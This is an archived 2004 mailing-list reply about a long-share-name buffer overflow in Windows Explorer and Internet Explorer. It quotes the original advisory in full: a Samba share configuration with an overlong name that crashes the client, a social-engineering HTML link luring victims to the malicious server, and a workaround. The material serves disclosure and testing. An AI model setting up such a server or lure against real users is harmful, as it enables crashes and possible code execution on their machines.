[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040426205555.11428.qmail@web12702.mail.yahoo.com>
From: dan57170 at yahoo.com (Daniel Regalado Arias)
Subject: Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.
Well, i have tested it in W2k with sp3 and explorer
didnt get crashed!!!!!!!
Well, i cant get into the share because a message
appears saying "share name not found"!!!!
But, explorer is OK.
--- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
escribi?: > Sunday afternoon is a bit boring, and
weather sucks
> down here in Santiago,
> Chile so here we go...
> The vuln is attached in TXT format, I would be
> gratefull if someone could
> verify if it affects windows 2003 as well.
>
> Rodrigo.-
> > Microsoft Explorer and Internet Explorer Long
Share
> Name Buffer Overflow.
>
>
>
> Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
>
> Affected: MS Internet Explorer, MS Explorer
> (explorer.exe)
> Windows XP(All), Windows 2000(All)
>
> Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
>
> Vendor Status: i notified the vendor in the
> beginning of 2002, this
> vulnerability was supposed to be
> fixed in xp service
> pack 1 according to the vendors
> knowledge base article
> 322857.
>
> Vendor url:
>
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
>
>
>
> Background.
>
> MS Explorer (explorer.exe) and MS Internet
> Explorer(IEXPLORE.EXE) are
> core pieces of Microsoft Windows Operating Systems.
>
>
>
> Description
>
> Windows fails to handle long share names when
> accessing a remote
> file servers such as samba, allowing a malicious
> server to crash the
> clients explorer and eventually get to execute
> arbitrary code in the
> machine as the current user (usually with
> Administrator rights in windows
> machines).
>
>
>
> Analysis
>
> In order to exploit this, an attacker must be able
> to get a user to connect
> to a malicious server which contains a share name
> equal or longer than 300
> characters, windows wont allow you to create such a
> share, but of course samba
> includes the feature ;). After your samba box is
> up and running create a
> share in you smb.conf :
>
>
>
> #------------ CUT HERE -------------
>
>
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> comment = Area 51
> path = /tmp/testfolder
> public = yes
> writable = yes
> printable = no
> browseable = yes
> write list = @trymywingchung
>
> #------------ CUT HERE -------------
>
>
> After your server is up, just get to your windows
> test box and get to the
> start menu > run > \\your.malicious.server.ip.,
> plufff, explorer will crash
> :).
>
> Social Engineering:
>
> <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
>
>
>
> Workaround.
>
> From your network card settings disable the client
> for Microsoft networks
> until a real fix for this vulnerability is
> available.
>
_________________________________________________________
Do You Yahoo!?
Informaci?n de Estados Unidos y Am?rica Latina, en Yahoo! Noticias.
Vis?tanos en http://noticias.espanol.yahoo.com
Powered by blists - more mailing lists